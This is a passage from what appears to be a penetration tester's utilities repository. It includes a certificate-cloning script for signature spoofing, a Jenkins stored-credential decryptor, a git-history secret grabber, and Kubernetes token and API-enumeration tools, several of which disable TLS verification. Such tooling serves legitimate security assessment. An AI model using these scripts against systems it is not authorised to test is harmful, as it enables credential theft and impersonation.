intermediate chain') 143 | 144 | 145 | return self.certs 146 | 147 | 148 | 149 | 150 | def dump_certs(certs, output='str'): 151 | '''Dumps human readable output in a number of formats from a list of openssl cert objects''' 152 | valid_outputs = ['str', 'json', 'json_friendly', 'str_exts', 'str_info', 'str_key'] 153 | if not output in valid_outputs: 154 | return 'Valid output formats are: {}'.format(', '.join(valid_outputs)) 155 | return getattr(cert_human.CertChainStore.from_pem('\n'.join([crypto.dump_certificate(crypto.FILETYPE_PEM,a).decode('utf8') for a in certs])), 'dump_{}'.format(output) ) 156 | 157 | 158 | 159 | # use this 160 | 161 | # grabs the cert chain from the remote server and matches it with the root cert from local store 162 | #cc = SSLCertChecker('server.name', 443) 163 | #certs = cc.get_certs() 164 | 165 | # dumps them all out in a big text based info dump 166 | #print(dump_certs(certs)) 167 | 168 | # intended for allowing analysis of all the relevant certs 169 | # is this a secure way of specifically verifying the cert chain? not so sure, do more research on this before making that conclusion 170 | # Check this for more: https://stackoverflow.com/questions/30700348/how-to-validate-verify-an-x509-certificate-chain-of-trust-in-python -------------------------------------------------------------------------------- /utilities/clone_cert.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # clones the clonable fields from a cert provided from an input file 4 | # creates a new cert with a new private key 5 | 6 | from OpenSSL import crypto 7 | from cryptography.hazmat.primitives import serialization 8 | import sys 9 | import base64 10 | 11 | def copy_cert_disk(input_cert_filename, output_cert_base_filename): 12 | '''Read in cert in PEM format, write to disk various faked copies based on provided filename pattern''' 13 | try: 14 | fd = open(input_cert_filename).read() 15 | except Exception as ex: 16 | return 'Error: %s' %(ex) 17 | x509 = crypto.load_certificate(crypto.FILETYPE_PEM, fd) 18 | 19 | # Creating key 20 | k = crypto.PKey() 21 | k.generate_key(crypto.TYPE_RSA, ((x509.get_pubkey()).bits())) 22 | cert = crypto.X509() 23 | 24 | # Setting cert details from the original certificate 25 | cert.set_version(x509.get_version()) 26 | cert.set_serial_number(x509.get_serial_number()) 27 | cert.set_subject(x509.get_subject()) 28 | cert.set_issuer(x509.get_issuer()) 29 | cert.set_notBefore(x509.get_notBefore()) 30 | cert.set_notAfter(x509.get_notAfter()) 31 | cert.set_pubkey(k) 32 | key1 = k.to_cryptography_key() 33 | 34 | # add extensions 35 | cert.add_extensions([x509.get_extension(a) for a in range(0, x509.get_extension_count())]) 36 | 37 | sig = x509.get_signature_algorithm() 38 | if 'WithRSAEncryption' not in sig: 39 | raise Exception('Error: RSA not used to sign cert --- what??. Signature algorithm: %s' %(sig)) 40 | cert.sign(k, sig.replace('WithRSAEncryption', '')) 41 | 42 | # Private key in traditional RSA PEM format - for SAML Raider import 43 | trsa = key1.private_bytes(encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption()) 44 | 45 | # PFX file format 46 | pfx = crypto.PKCS12() 47 | pfx.set_privatekey(k) 48 | pfx.set_certificate(cert) 49 | pfxdata = pfx.export() 50 | pfxdata_pwd = pfx.export(passphrase='password') # for burp 51 | 52 | 53 | # Write all the things 54 | open(output_cert_base_filename + '.cer', 'w').write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode('utf-8')) 55 | open(output_cert_base_filename + '.key', 'w').write(crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode('utf-8')) 56 | open(output_cert_base_filename + '_pub.key', 'w').write(crypto.dump_publickey(crypto.FILETYPE_PEM, k).decode('utf-8')) 57 | open(output_cert_base_filename + '_cert.der', 'wb').write(crypto.dump_certificate(crypto.FILETYPE_ASN1, cert)) 58 | open(output_cert_base_filename + '_priv.der', 'wb').write(crypto.dump_privatekey(crypto.FILETYPE_ASN1, k)) 59 | open(output_cert_base_filename + '_pub.der', 'w').write(crypto.dump_publickey(crypto.FILETYPE_ASN1, k)) 60 | open(output_cert_base_filename + '_trad_rsa.key', 'w').write(trsa) 61 | open(output_cert_base_filename + '.pfx', 'wb').write(pfxdata) 62 | open(output_cert_base_filename + '_password.pfx', 'wb').write(pfxdata_pwd) 63 | open(output_cert_base_filename + '_socat.cer', 'wb').write(crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode('utf-8')+crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode('utf-8')) 64 | 65 | 66 | 67 | 68 | def copy_cert(cert): 69 | '''Read in cert in base64 encoded format, as embedded in a SAML message or similar, return dict with faked copies''' 70 | x509 = crypto.load_certificate(crypto.FILETYPE_ASN1, base64.b64decode(cert)) 71 | 72 | # Creating key 73 | k = crypto.PKey() 74 | k.generate_key(crypto.TYPE_RSA, ((x509.get_pubkey()).bits())) 75 | cert = crypto.X509() 76 | 77 | # Setting cert details from the original certificate 78 | cert.set_version(x509.get_version()) 79 | cert.set_serial_number(x509.get_serial_number()) 80 | cert.set_subject(x509.get_subject()) 81 | cert.set_issuer(x509.get_issuer()) 82 | cert.set_notBefore(x509.get_notBefore()) 83 | cert.set_notAfter(x509.get_notAfter()) 84 | cert.set_pubkey(k) 85 | key1 = k.to_cryptography_key() 86 | 87 | # add extensions 88 | cert.add_extensions([x509.get_extension(a) for a in range(0, x509.get_extension_count())]) 89 | 90 | sig = x509.get_signature_algorithm().decode('ascii') 91 | if 'WithRSAEncryption' not in sig: 92 | raise Exception('Error: RSA not used to sign cert --- what??. Signature algorithm: %s' %(sig)) 93 | cert.sign(k, sig.replace('WithRSAEncryption', '')) 94 | 95 | # Private key in traditional RSA PEM format - for SAML Raider import 96 | trsa = key1.private_bytes(encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption()) 97 | 98 | # PFX file format 99 | pfx = crypto.PKCS12() 100 | pfx.set_privatekey(k) 101 | pfx.set_certificate(cert) 102 | pfxdata = pfx.export() 103 | pfxdata_pwd = pfx.export(passphrase=b'password') # for burp 104 | 105 | return { 106 | 'cert' : crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode('utf-8'), 107 | 'key' : crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode('utf-8'), 108 | 'pub' : crypto.dump_publickey(crypto.FILETYPE_PEM, k).decode('utf-8'), 109 | 'asn1_der_cert' : crypto.dump_certificate(crypto.FILETYPE_ASN1, cert), 110 | 'asn1_der_key' : crypto.dump_privatekey(crypto.FILETYPE_ASN1, k), 111 | 'asn1_der_pub' : crypto.dump_publickey(crypto.FILETYPE_ASN1, k), 112 | 'trad_rsa' : trsa, 113 | 'pfx' : pfxdata, 114 | 'pfx_password' : pfxdata_pwd, 115 | 'socat' : crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode('utf-8')+crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode('utf-8'), 116 | 'crypto' : crypto 117 | } 118 | 119 | 120 | #if __name__ == "__main__": 121 | 122 | -------------------------------------------------------------------------------- /utilities/create_eks_auth_token.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import base64 3 | import boto3 4 | import argparse 5 | import sys 6 | import requests 7 | import os 8 | import json 9 | 10 | 11 | requests.packages.urllib3.disable_warnings() 12 | 13 | class MyParser(argparse.ArgumentParser): 14 | def error(self, message): 15 | sys.stderr.write('error: %s\n' % message) 16 | self.print_help() 17 | sys.exit(2) 18 | 19 | 20 | # a lot of this borrowed from 21 | # https://github.com/aws/aws-cli/blob/develop/awscli/customizations/eks/get_token.py 22 | 23 | 24 | # Presigned url timeout in seconds 25 | URL_TIMEOUT = 60 26 | TOKEN_EXPIRATION_MINS = 14 27 | K8S_AWS_ID_HEADER = 'x-k8s-aws-id' 28 | TOKEN_PREFIX = 'k8s-aws-v1.' 29 | 30 | 31 | class TokenGenerator(object): 32 | def __init__(self, sts_client): 33 | self._sts_client = sts_client 34 | 35 | def get_token(self, k8s_aws_id): 36 | """Generate a presigned url token to pass to kubectl.""" 37 | url = self._get_presigned_url(k8s_aws_id) 38 | token = TOKEN_PREFIX + base64.urlsafe_b64encode( 39 | url.encode('utf-8') 40 | ).decode('utf-8').rstrip('=') 41 | return token 42 | 43 | def _get_presigned_url(self, k8s_aws_id): 44 | return self._sts_client.generate_presigned_url( 45 | 'get_caller_identity', 46 | Params={K8S_AWS_ID_HEADER: k8s_aws_id}, 47 | ExpiresIn=URL_TIMEOUT, 48 | HttpMethod='GET', 49 | ) 50 | 51 | 52 | class STSClientFactory(object): 53 | def __init__(self, session): 54 | self._session = session 55 | 56 | def get_sts_client(self, region_name=None, role_arn=None): 57 | client_kwargs = {'region_name': region_name} 58 | if role_arn is not None: 59 | creds = self._get_role_credentials(region_name, role_arn) 60 | client_kwargs['aws_access_key_id'] = creds['AccessKeyId'] 61 | client_kwargs['aws_secret_access_key'] = creds['SecretAccessKey'] 62 | client_kwargs['aws_session_token'] = creds['SessionToken'] 63 | sts = self._session.create_client('sts', **client_kwargs) 64 | self._register_k8s_aws_id_handlers(sts) 65 | return sts 66 | 67 | def _get_role_credentials(self, region_name, role_arn): 68 | sts = self._session.create_client('sts', region_name) 69 | return sts.assume_role( 70 | RoleArn=role_arn, RoleSessionName='EKSGetTokenAuth' 71 | )['Credentials'] 72 | 73 | def _register_k8s_aws_id_handlers(self, sts_client): 74 | sts_client.meta.events.register( 75 | 'provide-client-params.sts.GetCallerIdentity', 76 | self._retrieve_k8s_aws_id, 77 | ) 78 | sts_client.meta.events.register( 79 | 'before-sign.sts.GetCallerIdentity', 80 | self._inject_k8s_aws_id_header, 81 | ) 82 | 83 | def _retrieve_k8s_aws_id(self, params, context, **kwargs): 84 | if K8S_AWS_ID_HEADER in params: 85 | context[K8S_AWS_ID_HEADER] = params.pop(K8S_AWS_ID_HEADER) 86 | 87 | def _inject_k8s_aws_id_header(self, request, **kwargs): 88 | if K8S_AWS_ID_HEADER in request.context: 89 | request.headers[K8S_AWS_ID_HEADER] = request.context[K8S_AWS_ID_HEADER] 90 | 91 | 92 | def create_eks_token(session: boto3.session.Session=boto3.session.Session(), cluster_id: str=None) -> str: 93 | sclient = STSClientFactory(session._session).get_sts_client() 94 | tg = TokenGenerator(sclient) 95 | return tg.get_token(cluster_id) 96 | 97 | 98 | def kubernetes_whoami(token: str, host: str=None, port: int=None) -> dict: 99 | if not host: 100 | try: 101 | host = os.environ['KUBERNETES_SERVICE_HOST'] 102 | except Exception as e: 103 | print(f'Error in getting kubernetes host from environment: {str(e)}') 104 | sys.exit(1) 105 | if not port: 106 | try: 107 | port = int(os.environ['KUBERNETES_SERVICE_PORT_HTTPS']) 108 | except Exception as e: 109 | print(f'Error in getting kubernetes port from environment: {str(e)}') 110 | sys.exit(1) 111 | 112 | response = requests.post(f'https://{host}:{port}/apis/authentication.k8s.io/v1/selfsubjectreviews', json={}, headers={'Authorization': f'Bearer {token}'}, verify=False) 113 | if response.status_code == 200: 114 | return response.json() 115 | else: 116 | return response.content.decode() 117 | 118 | 119 | 120 | if __name__ == "__main__": 121 | parser = MyParser() 122 | parser.description = 'Create a token for use in authenticating to AWS EKS. If explicit credentials not supplied, boto3 will attempt to get them automatically from the system.' 123 | parser.add_argument('-c', '--cluster_id', type=str, required=True, help='EKS cluster name or cluster id. REQUIRED.') 124 | parser.add_argument('-i', '--aws_access_key_id', type=str, default=None, help='AWS Access Key') 125 | parser.add_argument('-k', '--aws_secret_access_key', type=str, default=None, help='AWS Secret Access Key') 126 | parser.add_argument('-s', '--aws_session_token', type=str, default=None, help='AWS Session Token') 127 | parser.add_argument('-t', '--test_whoami', action='store_true', help='Test the token is valid using whoami instead of printing the token to stdout') 128 | parser.add_argument('-a', '--kubernetes_api_host', type=str, default=None, help='Kubernetes API host to use for whoami testing. Auto detected from environment if not specified.') 129 | parser.add_argument('-p', '--kubernetes_api_port', type=int, default=None, help='Kubernetes API port to use for whoami testing. Auto detected from environment if not specified.') 130 | args = parser.parse_args() 131 | 132 | if args.aws_access_key_id and not args.aws_secret_access_key: 133 | print('If you provide an aws_access_key_id you must also supply at least an aws_secret_access_key') 134 | sys.exit(1) 135 | 136 | params = {} 137 | if args.aws_access_key_id: 138 | params = {a: getattr(args,a) for a in dir(args) if a.startswith('aws')} 139 | 140 | session = boto3.session.Session(**params) 141 | token = create_eks_token(session=session, cluster_id=args.cluster_id) 142 | if args.test_whoami: 143 | whoami = kubernetes_whoami(token, host=args.kubernetes_api_host, port=args.kubernetes_api_port) 144 | userInfo = whoami.get('status', {}).get('userInfo') 145 | if userInfo: 146 | print(json.dumps(userInfo, indent=4)) 147 | else: 148 | print(f'Whoami returned unexpected output: {whoami}') 149 | else: 150 | print(token) 151 | 152 | -------------------------------------------------------------------------------- /utilities/create_kubeconfig.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ $# -eq 0 ] 3 | then 4 | echo "Provide directory containing service account credentials as parameter 1" 5 | exit 1 6 | fi 7 | 8 | DIRECTORY="$1" 9 | CLUSTER_NAME='kubernetes' 10 | SERVER="https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}" 11 | NAMESPACE=$(cat $DIRECTORY/namespace) 12 | TOKEN=$(cat $DIRECTORY/token) 13 | CA=$(cat $DIRECTORY/ca.crt | base64 -w 0) 14 | 15 | if ! command jwt 2>&1| grep '\-show' > /dev/null 16 | then 17 | SERVICE_ACCOUNT='service-account' 18 | else 19 | SERVICE_ACCOUNT=$(cat $DIRECTORY/token | jwt -show - | grep '"serviceaccount":' -A 1 | grep name | cut -d ':' -f 2 | cut -d '"' -f 2) 20 | fi 21 | 22 | echo " 23 | --- 24 | apiVersion: v1 25 | kind: Config 26 | clusters: 27 | - name: ${CLUSTER_NAME} 28 | cluster: 29 | certificate-authority-data: ${CA} 30 | server: ${SERVER} 31 | contexts: 32 | - name: ${SERVICE_ACCOUNT}@${CLUSTER_NAME} 33 | context: 34 | cluster: ${CLUSTER_NAME} 35 | namespace: ${NAMESPACE} 36 | user: ${SERVICE_ACCOUNT} 37 | users: 38 | - name: ${SERVICE_ACCOUNT} 39 | user: 40 | token: ${TOKEN} 41 | current-context: ${SERVICE_ACCOUNT}@${CLUSTER_NAME} 42 | " -------------------------------------------------------------------------------- /utilities/git_analysis.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import datetime 3 | import glob 4 | import json 5 | import os 6 | import hashlib 7 | import gzip 8 | 9 | #################################### 10 | # Analysis process 11 | #################################### 12 | # run "git_secrets_grabber('git_parent_directory')"" - returns a hash that has entries for each discovered repository under parent dir, and subentries for each search term -> repo:word with subkeys raw, parsed, search 13 | # look at "search" output for each search string, identify the valid results (any unique part of the matching line), add them to a "results" key for each repo:word hash entry 14 | # once you're done, process with "gitsearch_results_parser" function - it finds entries that have the strings from "results" in them 15 | # can save outputs with json_file_write_gz, json_file_write functions 16 | # can further parse output with "git_results_file_data" function, easily show results etc 17 | 18 | # output can be (for git results gr): 19 | # * files for each repo containing secrets - print('\n'.join(sorted(gr[repo].keys()))) 20 | # * matching lines and line numbers showing content matching the search terms, check you are outputting correct results - git_results_file_data(gr) 21 | # * appendix data = git_results_file_data(data, contents=['matches', 'commits']) 22 | #################################### 23 | 24 | 25 | #################################### 26 | # Automation of these commands 27 | # git grep -in 'search_string' $(git rev-list --all) 28 | # git show / 29 | 30 | #filename search 31 | #git rev-list --all | xargs -I '{}' git ls-tree --full-tree -r '{}' | grep target_filename.txt | sort -u 32 | 33 | #################################### 34 | 35 | git = '/usr/bin/git' 36 | # search terms to look for in each repo 37 | words = [ 38 | 'access', 39 | 'key', 40 | 'password', 41 | 'secret', 42 | 'token' 43 | ] 44 | 45 | 46 | parser = lambda x : [a.split(':', 3) for a in x.split('\n') if a] 47 | 48 | def timestamp(): 49 | return datetime.datetime.now().strftime('%Y%m%d%H%M%s') 50 | 51 | 52 | def get_gitdir(base): 53 | '''Get git repos recursively under a provided parent directory''' 54 | return [a[::-1].replace('/.git'[::-1], '', 1)[::-1] for a in glob.iglob('{}/**/.git'.format(base.rstrip('/')), recursive=True)] 55 | 56 | 57 | def git_rev_list(git_command, repo): 58 | '''Get list of commits from a git repo''' 59 | proc = subprocess.Popen([git_command, 'rev-list', '--all'], stdout=subprocess.PIPE, bufsize=1024000, cwd=repo) 60 | out = [a for a in proc.stdout.read().decode('UTF-8').split('\n') if a] 61 | proc.terminate() 62 | return out 63 | 64 | 65 | def git_grep(git_command, search_pattern, repo): 66 | '''Run git grep command against all commits in a repo, case insensitive, providing line number of match''' 67 | revlist = git_rev_list(git_command, repo) 68 | proc = subprocess.Popen([git_command, 'grep', '-in', search_pattern] + revlist, stdout=subprocess.PIPE, bufsize=1024000, cwd=repo) 69 | out = proc.stdout.read().decode('UTF-8') 70 | proc.terminate() 71 | return out 72 | 73 | 74 | 75 | #git show REVISION:path/to/file 76 | def git_get_file(repo, revision, file_path, git_command=git): 77 | proc = subprocess.Popen([git_command, 'show', '{}:{}'.format(revision, file_path) ], stdout=subprocess.PIPE, bufsize=1024000, cwd=repo) 78 | out = proc.stdout.read().decode('UTF-8') 79 | proc.terminate() 80 | return out 81 | 82 | 83 | 84 | def git_secrets_grabber(basedir, words=words, git_command=git): 85 | '''Grab git secrets of all reppos underneath provided parent directory''' 86 | repos = get_gitdir(basedir) 87 | 88 | data = {} 89 | 90 | for repo in repos: 91 | data[repo] = {} 92 | for word in words: 93 | data[repo][word] = {} 94 | data[repo][word]['raw'] = git_grep(git_command, word, repo) 95 | data[repo][word]['parsed'] = parser(data[repo][word]['raw']) 96 | data[repo][word]['search'] = sorted(set([a[-1] for a in data[repo][word]['parsed']])) 97 | return data 98 | 99 | 100 | def sha1hash(data): 101 | return hashlib.sha1(data.encode()).hexdigest() 102 | 103 | 104 | def json_file_write_gz(filebase, data): 105 | gzip.open('{}_{}.json.gz'.format(filebase, timestamp()) ,'w' ).write(json.dumps(data, indent=4, sort_keys=True).encode()) 106 | 107 | 108 | def json_file_write(filebase, data): 109 | open('{}_{}.json'.format(filebase, timestamp()) ,'w' ).write(json.dumps(data, indent=4, sort_keys=True)) 110 | 111 | 112 | def json_file_read_gz(filename): 113 | return json.loads(gzip.open(filename).read()) 114 | 115 | 116 | def json_file_read(filename): 117 | return json.loads(open(filename).read()) 118 | 119 | 120 | # produces hash 121 | # repo:filename:fileinstance:[commits:matches] 122 | # fileinstance is a sha1 hash of the file content 123 | 124 | # add to results subkey under search entry and run me 125 | def gitsearch_results_parser(data): 126 | out = {} 127 | for repo in data.keys(): 128 | out[repo] = {} 129 | for search_pattern in data[repo].keys(): 130 | if 'results' in data[repo][search_pattern]: 131 | for result in data[repo][search_pattern]['results']: 132 | dictme = lambda y : {k: v for k,v in zip(['commit', 'filename', 'line', 'match'], y) } 133 | 134 | for match in [dictme(a) for a in data[repo][search_pattern]['parsed'] if result in a[-1] ]: 135 | 136 | if match['filename'] not in out[repo]: 137 | out[repo][match['filename']] = {} 138 | 139 | fc = git_get_file(repo, match['commit'], match['filename']) 140 | fh = sha1hash(fc) 141 | 142 | if fh not in out[repo][match['filename']]: 143 | out[repo][match['filename']][fh] = {} 144 | out[repo][match['filename']][fh]['content'] = fc 145 | out[repo][match['filename']][fh]['commits'] = [] 146 | out[repo][match['filename']][fh]['matches'] = [] 147 | 148 | 149 | if match['commit'] not in out[repo][match['filename']][fh]['commits']: 150 | out[repo][match['filename']][fh]['commits'].append(match['commit']) 151 | 152 | if [match['line'], match['match']] not in out[repo][match['filename']][fh]['matches']: 153 | out[repo][match['filename']][fh]['matches'].append([match['line'], match['match']]) 154 | 155 | return out 156 | 157 | 158 | # content, matches, commits are valid values for contents 159 | def git_results_file_data(data, repos=None, filenames=None, contents=['matches']): 160 | hashable_parser = lambda x : tuple(x) if isinstance(x, list) else x 161 | out = {} 162 | if repos == None: 163 | repos = list(data.keys()) 164 | 165 | for repo in (a for a in data.keys() if a in repos): 166 | out[repo] = {} 167 | if filenames == None: 168 | cfilenames = list(data[repo].keys()) 169 | else: 170 | cfilenames = filenames 171 | for filename in [a for a in data[repo].keys() if a in cfilenames]: 172 | if not filename in out[repo]: 173 | out[repo][filename] = {} 174 | for content in contents: 175 | out[repo][filename][content] = [] 176 | 177 | for fileinstance in data[repo][filename].keys(): 178 | for content in contents: 179 | if data[repo][filename][fileinstance][content] not in out[repo][filename][content]: 180 | out[repo][filename][content].append(data[repo][filename][fileinstance][content]) 181 | for content in contents: 182 | out[repo][filename][content] = out[repo][filename][content] if content == 'content' else list(set([hashable_parser(b) for a in out[repo][filename][content] for b in a])) 183 | 184 | return out 185 | 186 | 187 | 188 | # repo:filename:fileinstance:[commits:matches] 189 | # filename: 190 | # for an instance 191 | # -> commits 192 | # -> line numbers with secrets 193 | 194 | 195 | def appendix_data(data, repos=None): 196 | out = {} 197 | if repos == None: 198 | repos = list(data.keys()) 199 | 200 | for repo in (a for a in data.keys() if a in repos): 201 | out[repo] = {} 202 | for filename in data[repo].keys(): 203 | out[repo][filename] = [] 204 | for fileinstance in data[repo][filename].keys(): 205 | out[repo][filename].append({'matches' : [a[0] for a in data[repo][filename][fileinstance]['matches']], 'commits' : data[repo][filename][fileinstance]['commits']}) 206 | return out 207 | 208 | 209 | def appendix_printer(data, repos=None): 210 | out = '' 211 | dd = appendix_data(data, repos=None) 212 | for repo in dd.keys(): 213 | out+=repo.split('/')[-1]+'\n' 214 | for filename in dd[repo].keys(): 215 | out+='\t{}'.format(filename)+'\n' 216 | for entry in dd[repo][filename]: 217 | out+='\t\tIn a unique instance of the file found in the commits below, the following lines contained identified secrets: ({})'.format(', '.join(entry['matches']))+'\n' 218 | for commit in entry['commits']: 219 | out+='\t\t{}'.format(commit)+'\n' 220 | out+='\n' 221 | return out 222 | 223 | 224 | def csv_output(data, repos=None): 225 | out = 'Repository,Filename,Commit,Line_Numbers\n' 226 | dd = appendix_data(data, repos=None) 227 | for repo in dd.keys(): 228 | bline=repo.split('/')[-1]+',' 229 | for filename in sorted(dd[repo].keys()): 230 | line=bline+filename 231 | for entry in dd[repo][filename]: 232 | for commit in entry['commits']: 233 | out+='{},{},{}\n'.format(line, commit, ';'.join(entry['matches'])) 234 | return out 235 | 236 | -------------------------------------------------------------------------------- /utilities/jenkins-decrypt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Tidied from https://github.com/tweksteen/jenkins-decrypt and updated for python 3.10 4 | # 5 | # install pycryptodome for the requirements... 6 | 7 | import re 8 | import sys 9 | import base64 10 | from hashlib import sha256 11 | from Crypto.Cipher import AES 12 | 13 | MAGIC = b"::::MAGIC::::" 14 | 15 | def usage(): 16 | print("./decrypt.py ") 17 | sys.exit(0) 18 | 19 | def decryptNewPassword(secret, p): 20 | p = p[1:] #Strip the version 21 | 22 | # Get the length of the IV, almost certainly 16 bytes, but calculating for completeness sake 23 | iv_length = ((p[0] & 0xff) << 24) | ((p[1] & 0xff) << 16) | ((p[2] & 0xff) << 8) | (p[3] & 0xff) 24 | 25 | # Strip the iv length 26 | p = p[4:] 27 | 28 | # Get the data length 29 | data_length = ((p[0] & 0xff) << 24) | ((p[1] & 0xff) << 16) | ((p[2] & 0xff) << 8) | (p[3] & 0xff) 30 | 31 | # Strip the data length 32 | p = p[4:] 33 | 34 | iv = p[:iv_length] 35 | 36 | p = p[iv_length:] 37 | 38 | o = AES.new(secret, AES.MODE_CBC, iv) 39 | 40 | decrypted_p = o.decrypt(p) 41 | 42 | # We may need to strip PKCS7 padding 43 | fully_decrypted_blocks = decrypted_p[:-16] 44 | possibly_padded_block = decrypted_p[-16:] 45 | padding_length = possibly_padded_block[-1] 46 | if padding_length <= 16: # Less than size of one block, so we have padding 47 | possibly_padded_block = possibly_padded_block[:-padding_length] 48 | 49 | pw = fully_decrypted_blocks + possibly_padded_block 50 | pw = pw.decode('utf-8') 51 | return pw 52 | 53 | 54 | def decryptOldPassword(secret, p): 55 | # Copying the old code, I have not verified if it works 56 | o = AES.new(secret, AES.MODE_ECB) 57 | x = o.decrypt(p) 58 | assert MAGIC in x 59 | return re.findall('(.*)' + MAGIC, x)[0] 60 | 61 | 62 | def get_hudson_secret(master_key_file, hudson_key_file): 63 | master_key = open(master_key_file, 'rb').read() 64 | hudson_secret_key = open(hudson_key_file, 'rb').read() 65 | hashed_master_key = sha256(master_key).digest()[:16] 66 | o = AES.new(hashed_master_key, AES.MODE_ECB) 67 | secret = o.decrypt(hudson_secret_key) 68 | 69 | #secret = secret[:-16] 70 | secret = secret[:16] 71 | return secret 72 | 73 | 74 | 75 | def main(): 76 | if len(sys.argv) != 4: 77 | usage() 78 | 79 | secret = get_hudson_secret(sys.argv[1], sys.argv[2]) 80 | credentials = open(sys.argv[3]).read() 81 | passwords = re.findall(r'<(?:password|privateKey|bindPassword)>\{?(.*?)\}?', credentials) 82 | 83 | # You can find the password format at https://github.com/jenkinsci/jenkins/blob/master/core/src/main/java/hudson/util/Secret.java#L167-L216 84 | 85 | for password in passwords: 86 | print('Found a credential and attempting decryption...') 87 | #p = base64.decodestring(bytes(password, 'utf-8')) 88 | p = base64.b64decode(bytes(password, 'utf-8')) 89 | 90 | # Get payload version 91 | payload_version = p[0] 92 | if payload_version == 1: 93 | print(decryptNewPassword(secret, p)) 94 | else: # Assuming we don't have a V2 payload, seeing as current crypto isn't horrible that's a fair assumption 95 | print(decryptOldPassword(secret,p)) 96 | 97 | if __name__ == '__main__': 98 | main() 99 | -------------------------------------------------------------------------------- /utilities/kubernetes_api_enumerator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import json 3 | import queue 4 | import sys 5 | import requests 6 | import argparse 7 | import logging 8 | from datetime import datetime 9 | from logging import Logger 10 | 11 | 12 | requests.packages.urllib3.disable_warnings() 13 | 14 | def check_ipython() -> bool: 15 | '''Returns True if script is running in interactive iPython shell''' 16 | try: 17 | get_ipython() 18 | return True 19 | except NameError: 20 | return False 21 | 22 | 23 | class MyParser(argparse.ArgumentParser): 24 | '''Custom argument parser''' 25 | def error(self, message: str): 26 | sys.stderr.write('error: %s\n' % message) 27 | self.print_help() 28 | sys.exit(2) 29 | 30 | 31 | def create_logger(loglevel: str, name: str) -> Logger: 32 | '''Create a custom logger instance''' 33 | logger = logging.getLogger(name) 34 | logger.setLevel(loglevel) 35 | handler = logging.StreamHandler(sys.stderr) 36 | formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') 37 | handler.setFormatter(formatter) 38 | logger.addHandler(handler) 39 | 40 | return logger 41 | 42 | 43 | class APIEnumerator: 44 | 45 | def __init__(self, apiserver, logger=Logger('APIEnumerator'), clientcert=None, clientkey=None, token=None, enumpaths=['/apis', '/api'], apiextract=True): 46 | self.apiserver = apiserver 47 | self.logger = logger 48 | self.session = requests.Session() 49 | self.session.verify = False 50 | self.enumpaths = enumpaths 51 | self.output = {} 52 | self.queue = queue.SimpleQueue() 53 | self.apiextract = apiextract 54 | if clientcert and clientkey: 55 | self.clientcert = clientcert 56 | self.clientkey = clientkey 57 | self.session.cert = (clientcert, clientkey) 58 | elif token: 59 | self.token = token 60 | self.session.headers = {'Authorization': 'Bearer {}'.format(token)} 61 | else: 62 | self.logger.info('No authentication') 63 | raise Exception('No authentication method configured') 64 | 65 | 66 | def _response_parser(self, response, parent): 67 | if response.get('kind') == 'APIGroupList': 68 | for group in response['groups']: 69 | for version in group['versions']: 70 | self.queue.put('{}/{}'.format(parent, version['groupVersion']).replace('//', '/')) 71 | elif response.get('kind') == 'APIResourceList': 72 | for resource in response['resources']: 73 | self.queue.put('{}/{}'.format(parent, resource['name']).replace('//', '/')) 74 | elif response.get('kind') == 'APIVersions': 75 | for version in response['versions']: 76 | self.queue.put('{}/{}'.format(parent, version).replace('//', '/')) 77 | 78 | 79 | def _try_openapi_eum(self): 80 | r = self.session.get('https://{}/openapi/v2'.format(self.apiserver)) 81 | if r.status_code == 200 and r.headers.get('Content-Type') == 'application/json' and self.apiextract: 82 | apidef = json.loads(r.content) 83 | if 'paths' in apidef: 84 | self.logger.info('Path information extracted from API def') 85 | for key in apidef['paths']: 86 | # remove paths that require parameters ({value}) and ones that will never finish (/watch/) 87 | if not '{' in key and not '/watch/' in key: 88 | self.queue.put(key) 89 | else: 90 | for path in self.enumpaths: 91 | self.queue.put(path) 92 | 93 | 94 | def enum(self): 95 | self._try_openapi_eum() 96 | while not self.queue.empty(): 97 | path = self.queue.get() 98 | self.logger.info('{}{}'.format(self.apiserver, path)) 99 | r = self.session.get('https://{}{}'.format(self.apiserver, path)) 100 | if r.headers.get('Content-Type') == 'application/json': 101 | self.output[path] = json.loads(r.content) 102 | if r.status_code == 200: 103 | self._response_parser(json.loads(r.content), path) 104 | 105 | 106 | def command_line(): 107 | parser = MyParser() 108 | input_arg_group = parser.add_argument_group('General') 109 | input_arg_group.add_argument('-server', type=str, required=True, help='Kubernetes API Server domain name. Include port if not 443') 110 | input_arg_group.add_argument('-noapiextract', action='store_false', help='Disable extraction of paths from openapiv2 endpoint') 111 | 112 | output_arg_group = parser.add_argument_group('Output') 113 | output_arg_group.add_argument('-output', type=str, default=None, help='Output filename') 114 | output_arg_group.add_argument('-loglevel', choices=['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'], default='WARNING', help='Set logging level') 115 | 116 | auth_arg_group = parser.add_argument_group('Authentication') 117 | mgroup_schema = auth_arg_group.add_mutually_exclusive_group() 118 | mgroup_schema.add_argument('-clientcert', type=str, default=None, help='Client certificate (PEM) file') 119 | mgroup_schema.add_argument('-token', type=str, default=None, help='Authorization token') 120 | auth_arg_group.add_argument('-clientkey', type=str, default=None, help='Key file (PRIVATE KEY) associated with client certificate') 121 | 122 | args = parser.parse_args() 123 | 124 | logger = create_logger(args.loglevel, 'Kubernetes API Enumerator') 125 | 126 | if (not args.clientcert) and (not args.token): 127 | print('Provide at least one authentication method (token or client certificate 